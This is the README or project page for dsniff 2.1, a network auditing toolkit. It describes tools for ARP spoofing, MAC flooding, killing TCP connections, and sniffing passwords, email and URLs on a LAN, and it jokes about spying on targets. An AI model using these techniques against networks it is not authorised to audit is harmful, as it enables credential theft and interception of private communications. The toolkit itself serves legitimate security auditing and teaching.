dsniff

overview

i wrote these tools with honest intentions - to audit my own network, and to demonstrate the insecurity of cleartext network protocols. please do not abuse this software.

description

arpredirect: intercept packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. this is an extremely effective way of sniffing traffic on a switch. kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter :-) must be turned on ahead of time.

macof: flood the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). a straight C port of the original Perl Net::RawIP macof program.

tcpkill: kill specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-whs for TCB creation).

tcpnice: slow down specified in-progress TCP connections via "active" traffic shaping (useful for sniffing fast networks). forges tiny TCP window advertisements, and optionally ICMP source quench replies.

dsniff: password sniffer. handles FTP, Telnet, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, NFS, YP, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, and Oracle SQL*Net auth info. dsniff minimally parses each application protocol, only saving the interesting bits, and uses Berkeley DB as its output file format, only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).

mailsnarf: a fast and easy way to violate the Electronic Communications Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs all messages sniffed from SMTP traffic in Berkeley mbox format, suitable for offline browsing with your favorite mail reader (mail -f, pine, etc.).

urlsnarf: output all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.).

webspy: sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time (as the target surfs, your browser surfs along with them, automagically). a fun party trick. :-)

installation

latest version: dsniff-2.1.tar.gz (CHANGES)

these programs require:

(if packetfactory is down, goto packetstorm or google)

built and tested on OpenBSD, Linux, and Solaris. YMMV.

troubleshooting

"not seeing anything"
  1. if you're on alpha, sorry, i suk. alpha support in next release.
  2. make sure you can see the traffic using tcpdump. if not, you suk. use arpredirect to intercept it.
  3. make sure you can see both sides of a TCP connection. if not, you suk. use the -c flag to dsniff to do half-duplex reassembly ("if you can't freak it, fake the funk").
  4. make sure the correct decode is triggering on your traffic (use the -d flag to dsniff to see). if not, you suk. dump the default triggers to dsniff.services, add the correct port mapping for your traffic, and run dsniff with -f.

"not decoding XYZ protocol"

  1. if the decode is triggering (use the -d flag to dsniff to see) but failing to produce output, i suk. send me a full traffic trace, or dump the default triggers, change the port mapping for your traffic to "hex", run dsniff with -f, and send me output.
  2. dsniff isn't magic, it only decodes what it knows about. send me full traffic traces (tcpdump -s 2000 -w /tmp/foo, or anything else supported by ethereal), and i'll see what i can do.

"my girlfriend is cheating on me"

  1. deinstall mailsnarf. you suk.

future work

filesnarf (NFS, SMB, AFS), msgsnarf (ICQ, AIM, IRC), screenspy (x11, VNC), tcptype (network application protocol detection), etc.

(don't hold your breath)


<dugsong@monkey.org>